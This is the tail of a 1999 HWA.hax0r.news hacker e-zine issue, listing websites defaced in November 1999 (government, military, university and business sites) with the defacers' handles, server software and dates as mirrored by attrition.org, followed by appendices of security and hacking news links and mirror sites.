Defaced domain: www.nypa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.nypa.gov
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/10/99
Defaced domain: www.twu.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/09/www.twu.ca
Defaced by: hackcanada.com
Operating System: Windows NT (IIS/4.0)
Date 11/10/99
Defaced domain: www.futuresuperstock.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.futuresuperstock.com
Defaced by: Narcissus
Operating System: Windows NT (IIS/3.0)
Date 11/10/99
Defaced domain: www.soften.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/10/www.soften.com
Defaced by: c0ax
Operating System: Windows NT
Date 11/10/99
Defaced domain: afford2.netc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/afford2.netc.com
Defaced by: hell
Operating System: Windows 95
Date 11/11/99
Defaced domain: abraham.eng.buffalo.edu
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/abraham.eng.buffalo.edu
Defaced by: section8
Operating System: Windows NT
Date 11/11/99
Defaced domain: ceserver.jpl.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ceserver.jpl.na
sa.gov
Defaced by: Uneek Technologies
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.ci.beverly-hills.ca.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.ci.beverly-hills.ca.us
Defaced by: kryptek
Operating System: Solaris
Date 11/11/99
Defaced domain: www.manningham.vic.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.manningham.vic.gov.au
Defaced by: ned rubenschlachen
Operating System: Windows NT
Date 11/11/99
Defaced domain: airsar.jpl.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/airsar.jpl.nasa.gov
Defaced by: dukj
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.rucker.amedd.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.rucker.amedd.army.mil
Defaced by: hV2k
Operating System: Windows Nt
Date 11/11/99
Defaced domain: www.unitedskins.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.unitedskins.com
Defaced by: SunDevil
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.mda.state.mn.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.mda.state.mn.us
Defaced by: hV2k
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.wgrlc.vic.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.wgrlc.vic.gov.au
Defaced by: dukj
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.dcjs.state.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.dcjs.state.va.us
Defaced by: twd
Operating System: Windows NT
Date 11/11/99
Defaced domain: www.plebius.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.plebius.org
Defaced by: z0z
Operating System: Bf
Date 11/11/99
Defaced domain: www.palacewizard.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.palacewizard.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c)
Date 11/11/99
Defaced domain: www.racquel.eroticvideos.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.racquel.eroticvideos.com
Defaced by: kryptek
Operating System: Solaris 2.5x (Netscape-Enterprise/2.01c)
Date 11/11/99
Defaced domain: corp.jkr.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/corp.jkr.gov.my
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99
Defaced domain: www.2rotc.army.mil
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.2rotc.army.mil
Defaced by: hV2k
Operating System: Windows NT (IIS/4.0)
Date 11/11/99
Defaced domain: www.apa.state.va.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.apa.state.va.us
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Date 11/11/99
Defaced domain: ene.gov.on.ca
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/ene.gov.on.ca
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99
Defaced domain: fmprc.gov.cn
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/fmprc.gov.cn
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/11/99
Defaced domain: intra.taipei.gov.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/intra.taipei.gov.tw
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: www.commercialpro.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/11/www.commercialpro.com
Defaced by: PHC
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: mineco.fgov.be
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/mineco.fgov.be
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: pyxis.stf.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/pyxis.stf.gov.br
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: shop.gov.sg
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shop.gov.sg
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: shjlib.gov.ae
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/shjlib.gov.ae
Defaced by: fuqrag
Operating System: Windows NT (IIS/4.0)
Date 11/12/99
Defaced domain: www.koko.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.koko.gov.my
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.dewa.gov.ae
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.dewa.gov.ae
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.do-it-better.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.do-it-better.com
Defaced by: Fuby
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.hyd.gov.hk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hyd.gov.hk
Defaced by: dukj
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.aodc.gov.au
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.aodc.gov.au
Defaced by: ALOC
Operating System: Solaris
Date 11/12/99
Defaced domain: athena.infopreneur.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/athena.infopreneur.com
Defaced by: Blade
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.cmiteamwork.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.cmiteamwork.com
Defaced by: v00d00
Operating System: Windows NT
Date 11/12/99
Defaced domain: www.shssf.edu.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.shssf.edu.tw
Defaced by: TREATY
Operating System: Solaris
Date 11/12/99
Defaced domain: www.hkl.gov.my
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/www.hkl.gov.my
Defaced by: TREATY
Operating System: Solaris
Date 11/12/99
Defaced domain: caetano.fenorte.uenf.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/caetano.fenorte.uenf.br
Defaced by: r4ideN
Operating System: Linux (Apache 1.2.4)
Date 11/12/99
Defaced domain: fusion.sci.hiroshima-u.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/12/fusion.sci.hiroshima-u.ac.jp
Operating System: Solaris
Date 11/13/99
Defaced domain: eo1.gsfc.nasa.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/eo1.gsfc.nasa.gov
Defaced by: Verb0
Operating System: Windows Nt
Date 11/13/99
Defaced domain: www.aptv.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.aptv.org
Defaced by: busdr1v3r
Operating System: Irix
Date 11/13/99
Defaced domain: www.pgj.ma.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.pgj.ma.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.ipem.mg.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.ipem.mg.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.sect.mg.gov.br
Mirror: http://www.attrition.org/mirror/attrition/1999/11/13/www.sect.mg.gov.br
Defaced by: NFO
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.wnym.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wnym.com
Defaced by: Chaos Crew
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99
Defaced domain: www.duqpart.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.duqpart.com
Defaced by: Chaos Inc.
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99
Defaced domain: www.bengarelick.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bengarelick.com
Defaced by: darkness
Operating System: Linux (Netscape-FastTrack/2.01)
Date 11/14/99
Defaced domain: www.unitedskins.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.unitedskins.com
Defaced by: SunDevil
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.greenelec.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.greenelec.com
Defaced by: wkD
Operating System: Linux
Date 11/14/99
Defaced domain: www.cwc.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cwc.gov
Defaced by: Coolio
Operating System: Linux
Date 11/14/99
Defaced domain: www.syokubutu.rika.juen.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.syokubutu.rika.juen.ac.jp
Defaced by: DHC
Operating System: Windows 95
Date 11/14/99
Defaced domain: www.dare.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dare.com
Defaced by: Coolio
Operating System: Irix
Date 11/14/99
Defaced domain: www.dairyqueen.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.dairyqueen.com
Defaced by: Beyond
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.hyd.gov.hk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.hyd.gov.hk
Defaced by: Beyond
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.europa.aichi-edu.ac.jp
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.europa.aichi-edu.ac.jp
Defaced by: Code Kings
Operating System: Windows 95
Date 11/14/99
Defaced domain: www.acss.com.tw
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.acss.com.tw
Defaced by: DHC
Operating System: Windows NT
Date 11/14/99
Defaced domain: www.trucktrack.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.trucktrack.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.bjrc.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bjrc.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.advancedwireless.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.advancedwireless.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.spartafoods.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.spartafoods.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.matept.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.matept.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.flopz.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.flopz.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.mncoop.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mncoop.org
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.babybook.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.babybook.net
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.microassist.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.microassist.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.cdcs.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.cdcs.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: www.wed.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.wed.com
Defaced by: nemesystm
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
Defaced domain: goffstown.lib.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/goffstown.lib.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99
Defaced domain: bectraining.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/bectraining.com
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99
Defaced domain: www.adc-electronic.de
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.adc-electronic.de
Operating System: Solaris 2.6 - 2.7 (Apache 1.2.6)
Date 11/14/99
Defaced domain: hooksett.lib.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/hooksett.lib.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99
Defaced domain: seresc.k12.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/seresc.k12.nh.us
Defaced by: hacking 4 ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99
Defaced domain: litchfield.k12.nh.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/litchfield.k12.nh.us
Defaced by: Hacking 4 Ponies
Operating System: Linux (Apache 1.2.4)
Date 11/14/99
Defaced domain: www.7thheaven.org
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.7thheaven.org
Defaced by: NitrOBurN
Operating System: Linux (Apache 1.3.4)
Date 11/14/99
Defaced domain: www.mv2000.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.mv2000.com
Defaced by: darkness
Operating System: Linux (Apache 1.3.6)
Date 11/14/99
Defaced domain: www.bellcity.net
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.bellcity.net
Defaced by: darkness
Operating System: Linux (Apache 1.3.6)
Date 11/14/99
Defaced domain: www.ntia.doc.gov
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.ntia.doc.gov
Defaced by: Comdext0r
Operating System: Windows NT (WebSitePro/1.1f)
Date 11/14/99
Defaced domain: www.clearvista.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/14/www.clearvista.com
Defaced by: spinkus
Operating System: Windows NT (IIS/4.0)
Date 11/14/99
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
